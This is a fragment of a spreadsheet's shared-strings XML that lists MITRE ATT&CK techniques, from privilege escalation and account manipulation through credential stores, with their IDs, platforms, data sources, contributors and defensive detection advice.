  </si>
  <si>
    <t xml:space="preserve">SIP and Trust Provider Hijacking </t>
  </si>
  <si>
    <t xml:space="preserve">Install Root Certificate </t>
  </si>
  <si>
    <t xml:space="preserve">Template Injection </t>
  </si>
  <si>
    <t xml:space="preserve">Trusted Developer Utilities Proxy Execution </t>
  </si>
  <si>
    <t xml:space="preserve">MSBuild </t>
  </si>
  <si>
    <t xml:space="preserve">Unused/Unsupported Cloud Regions </t>
  </si>
  <si>
    <t xml:space="preserve">XSL Script Processing </t>
  </si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Defense Evasion,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</si>
  <si>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</si>
  <si>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Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Administrator, User</t>
  </si>
  <si>
    <t>T1548.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Windows</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Casey Smith; Stefan Kanthak</t>
  </si>
  <si>
    <t>Windows User Account Control</t>
  </si>
  <si>
    <t>T1548.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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macOS</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Erika Noerenberg, @gutterchurl, Carbon Black; Jimmy Astle, @AstleJimmy, Carbon Black</t>
  </si>
  <si>
    <t>T1548.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1548/001</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.</t>
  </si>
  <si>
    <t>Linux, macOS</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification</t>
  </si>
  <si>
    <t>User</t>
  </si>
  <si>
    <t>T1548.003</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism: Sudo and Sudo Caching</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Modification, Process: Process Creation, Process: Process Metadata</t>
  </si>
  <si>
    <t>T1134</t>
  </si>
  <si>
    <t>Access Token Manipulation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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>Jared Atkinson, @jaredcatkinson; Robby Winchester, @robwinchester3; Tom Ueltschi @c_APT_ure; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>File system access controls, Heuristic Detection, Host forensic analysis, System access controls, Windows User Account Control</t>
  </si>
  <si>
    <t>T1134.002</t>
  </si>
  <si>
    <t>Access Token Manipulation: Create Process with Token</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1134/002</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</si>
  <si>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</si>
  <si>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Command: Command Execution, Process: OS API Execution</t>
  </si>
  <si>
    <t>File system access controls, System access controls, Windows User Account Control</t>
  </si>
  <si>
    <t>T1134.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1134.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Process: OS API Execution, Process: Process Creation, Process: Process Metadata</t>
  </si>
  <si>
    <t>Wayne Silva, F-Secure Countercept</t>
  </si>
  <si>
    <t>Heuristic Detection, Host forensic analysis</t>
  </si>
  <si>
    <t>T1134.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Active Directory: Active Directory Object Modification, Process: OS API Execution, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>Alain Homewood, Insomnia Security; Vincent Le Toux</t>
  </si>
  <si>
    <t>Administrator, SYSTEM</t>
  </si>
  <si>
    <t>T1134.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1531</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1531</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</si>
  <si>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</si>
  <si>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Active Directory: Active Directory Object Modification, User Account: User Account Deletion, User Account: User Account Modification</t>
  </si>
  <si>
    <t>T1087</t>
  </si>
  <si>
    <t>Account Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1087.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Azure AD, Google Workspace, IaaS, Office 365, SaaS</t>
  </si>
  <si>
    <t>Command: Command Execution, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>Praetorian</t>
  </si>
  <si>
    <t>T1087.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1087.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Google Workspace, Office 365, Windows</t>
  </si>
  <si>
    <t>T1087.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1087/001</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: Process Creation</t>
  </si>
  <si>
    <t>Daniel Stepanic, Elastic</t>
  </si>
  <si>
    <t>T1098</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1098</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</si>
  <si>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</si>
  <si>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Azure AD, Google Workspace, IaaS, Linux, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Modification, Group: Group Modification, Process: Process Creation, User Account: User Account Modification</t>
  </si>
  <si>
    <t>Jannie Li, Microsoft Threat Intelligence Center (MSTIC); Praetorian; Tim MalcomVetter</t>
  </si>
  <si>
    <t>T1098.003</t>
  </si>
  <si>
    <t>Account Manipulation: Add Office 365 Global Administrator Role</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1098/003</t>
  </si>
  <si>
    <t xml:space="preserve">Collect usage logs from cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. </t>
  </si>
  <si>
    <t>Office 365</t>
  </si>
  <si>
    <t>User Account: User Account Modification</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>T1098.001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1098/001</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, User Account: User Account Modification</t>
  </si>
  <si>
    <t>Expel; Jannie Li, Microsoft Threat Intelligence Center (MSTIC); Oleg Kolesnikov, Securonix</t>
  </si>
  <si>
    <t>T1098.002</t>
  </si>
  <si>
    <t>Account Manipulation: Exchange Email Delegate Permissions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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Office 365, Windows</t>
  </si>
  <si>
    <t>Group: Group Modification, User Account: User Account Modification</t>
  </si>
  <si>
    <t>Jannie Li, Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>T1098.004</t>
  </si>
  <si>
    <t>Account Manipulation: SSH Authorized Keys</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1098/004</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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>Tony Lambert, Red Canary</t>
  </si>
  <si>
    <t>T1583</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Resource Development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</si>
  <si>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</si>
  <si>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PRE</t>
  </si>
  <si>
    <t>T1583.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1583.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>T1583.001</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Domains</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Deloitte Threat Library Team; Vinayak Wadhwa, Lucideus; Wes Hurd</t>
  </si>
  <si>
    <t>T1583.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1583.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1583.006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1595</t>
  </si>
  <si>
    <t>Active Scanning</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Reconnaissance</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</si>
  <si>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</si>
  <si>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 Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1595.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Flow</t>
  </si>
  <si>
    <t>T1595.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1071</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1071.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Jan Petrov, Citi</t>
  </si>
  <si>
    <t>T1071.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1071.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1071.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1010</t>
  </si>
  <si>
    <t>Application Window Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Windows, macOS</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1560</t>
  </si>
  <si>
    <t>Archive Collected Data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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 Script: Script Execution</t>
  </si>
  <si>
    <t>T1560.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1560.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1560.001</t>
  </si>
  <si>
    <t>Archive Collected Data: Archive via Utility</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1123</t>
  </si>
  <si>
    <t>Audio Capture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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1119</t>
  </si>
  <si>
    <t>Automated Collection</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1119</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</si>
  <si>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</si>
  <si>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Script: Script Execution</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>Automated Exfiltration</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.</t>
  </si>
  <si>
    <t>Linux, Network, Windows, macOS</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Script: Script Execution</t>
  </si>
  <si>
    <t>ExtraHop</t>
  </si>
  <si>
    <t>T1020.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1020/001</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>BITS Jobs</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Defense Evasion, Persistence</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</si>
  <si>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</si>
  <si>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Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>Brent Murphy, Elastic; David French, Elastic; Red Canary; Ricardo Dias</t>
  </si>
  <si>
    <t>Firewall, Host forensic analysis</t>
  </si>
  <si>
    <t>T1547</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution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</si>
  <si>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</si>
  <si>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</si>
  <si>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Persistence, Privilege Escalation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</si>
  <si>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</si>
  <si>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</si>
  <si>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Administrator, User, root</t>
  </si>
  <si>
    <t>T1547.014</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Bencherchali Nasreddine, @nas_bench, ELIT Security Team (DSSD)</t>
  </si>
  <si>
    <t>Administrator</t>
  </si>
  <si>
    <t>T1547.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Module: Module Load, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1547.006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/006</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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Creation, Kernel: Kernel Module Load</t>
  </si>
  <si>
    <t>Anastasios Pingios; Jeremy Galloway; Red Canary; Wayne Silva, F-Secure Countercept</t>
  </si>
  <si>
    <t>root</t>
  </si>
  <si>
    <t>T1547.008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load</t>
  </si>
  <si>
    <t>Vincent Le Toux</t>
  </si>
  <si>
    <t>T1547.011</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Plist Modification</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/011</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</si>
  <si>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</si>
  <si>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File: File Creation, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1547.010</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Port Monitors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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Creation, Module: Module Load, Process: OS API Execution, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Stefan Kanthak; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1547.012</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Driver: Driver Load, File: File Creation, Module: Module Load, Process: OS API Execution, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Mathieu Tartare, ESET</t>
  </si>
  <si>
    <t>T1547.007</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/007</t>
  </si>
  <si>
    <t>Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification</t>
  </si>
  <si>
    <t>T1547.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Oddvar Moe, @oddvarmoe</t>
  </si>
  <si>
    <t>T1547.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1547.009</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1547.003</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Time Providers</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Scott Lundgren, @5twenty9, Carbon Black</t>
  </si>
  <si>
    <t>T1547.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1547.013</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Linux</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>User, root</t>
  </si>
  <si>
    <t>T1037</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>T1037.002</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts: Logon Script (Mac)</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1037/002</t>
  </si>
  <si>
    <t>T1037.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Monitor for changes to Registry values associated with Windows logon scrips, nameley &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt;.
Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>T1037.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1037.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1037.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1217</t>
  </si>
  <si>
    <t>Browser Bookmark Discovery</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Mike Kemmerer</t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <t>Browser Extensions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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>Chris Ross @xorrior; Justin Warner, ICEBRG</t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>Brute Force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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1110</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</si>
  <si>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</si>
  <si>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Azure AD, Containers, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; David Fiser, @anu4is, Trend Micro; Ed Williams, Trustwave, SpiderLabs; Magno Logan, @magnologan, Trend Micro; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1110.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.</t>
  </si>
  <si>
    <t>Anastasios Pingios; Diogo Fernandes</t>
  </si>
  <si>
    <t>T1110.002</t>
  </si>
  <si>
    <t>Brute Force: Password Cracking</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>T1110.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1110/001</t>
  </si>
  <si>
    <t>T1110.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1612</t>
  </si>
  <si>
    <t>Build Image on Host</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Containers</t>
  </si>
  <si>
    <t>Image: Image Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Assaf Morag, @MoragAssaf, Team Nautilus Aqua Security; Michael Katchinskiy, @michael64194968, Team Nautilus Aqua Security; Roi Kol, @roykol1, Team Nautilus Aqua Security; Vishwas Manral, McAfee</t>
  </si>
  <si>
    <t>T1115</t>
  </si>
  <si>
    <t>Clipboard Data</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.</t>
  </si>
  <si>
    <t>T1580</t>
  </si>
  <si>
    <t>Cloud Infrastructure Discovery</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1580</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</si>
  <si>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</si>
  <si>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IaaS</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Enumeration, Cloud Storage: Cloud Storage Metadata, Instance: Instance Enumeration, Instance: Instance Metadata, Snapshot: Snapshot Enumeration, Snapshot: Snapshot Metadata, Volume: Volume Enumeration, Volume: Volume Metadata</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Monitor account activity logs to see actions performed and activity associated with the cloud service management console. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Office 365</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1526</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1059</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1059</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</si>
  <si>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</si>
  <si>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Command Execution, Module: Module Load, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1059.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1059.007</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Cody Thomas, SpecterOps</t>
  </si>
  <si>
    <t>T1059.008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1059/008</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</si>
  <si>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</si>
  <si>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Command: Command Execution</t>
  </si>
  <si>
    <t>T1059.001</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: PowerShell</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1059/001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</si>
  <si>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</si>
  <si>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T1059.006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1059.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1059.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1059.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1092</t>
  </si>
  <si>
    <t>Communication Through Removable Media</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Drive: Drive Access, Drive: Drive Creation</t>
  </si>
  <si>
    <t>T1586</t>
  </si>
  <si>
    <t>Compromise Accounts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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1586.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1586.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1554</t>
  </si>
  <si>
    <t>Compromise Client Software Binary</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Creation, File: File Deletion, File: File Metadata, File: File Modification</t>
  </si>
  <si>
    <t>CrowdStrike Falcon OverWatch</t>
  </si>
  <si>
    <t>T1584</t>
  </si>
  <si>
    <t>Compromise Infrastructure</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1584</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>T1584.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1584.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1584/002</t>
  </si>
  <si>
    <t>T1584.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1584.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1584.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1584.006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1609</t>
  </si>
  <si>
    <t>Container Administration Command</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1613</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Center for Threat-Informed Defense (CTID); Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1136</t>
  </si>
  <si>
    <t>Create Account</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Process: Process Creation, User Account: User Account Creation</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center (MSTIC); Praetorian</t>
  </si>
  <si>
    <t>T1136.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Collect usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.</t>
  </si>
  <si>
    <t>User Account: User Account Creation</t>
  </si>
  <si>
    <t>T1136.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1136.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1543</t>
  </si>
  <si>
    <t>Create or Modify System Process</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1543.001</t>
  </si>
  <si>
    <t>Create or Modify System Process: Launch Agent</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1543/001</t>
  </si>
  <si>
    <t>Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s  KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Service: Service Creation, Service: Service Modification</t>
  </si>
  <si>
    <t>T1543.004</t>
  </si>
  <si>
    <t>Create or Modify System Process: Launch Daemon</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1543/004</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for launch daemon creation or modification through plist files and utilities such as Objective-See's KnockKnock application. </t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification</t>
  </si>
  <si>
    <t>T1543.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1543.003</t>
  </si>
  <si>
    <t>Create or Modify System Process: Windows Service</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Matthew Demaske, Adaptforward; Pedro Harrison; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1555</t>
  </si>
  <si>
    <t>Credentials from Password Stores</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Access, Process: Process Creation</t>
  </si>
  <si>
    <t>T1555.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Access</t>
  </si>
  <si>
    <t>Barry Shteiman, Exabeam; RedHuntLabs, @redhuntlabs; Ryan Benson, Exabeam; Sylvain Gil, Exabeam</t>
  </si>
  <si>
    <t>T1555.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1555/001</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1555.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1555.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Process: Process Access</t>
  </si>
  <si>
    <t>T1555.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1555/004</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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Bernaldo Penas Antelo; Mugdha Peter Bansode</t>
  </si>
  <si>
    <t>T1485</t>
  </si>
  <si>
    <t>Data Destruction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</si>
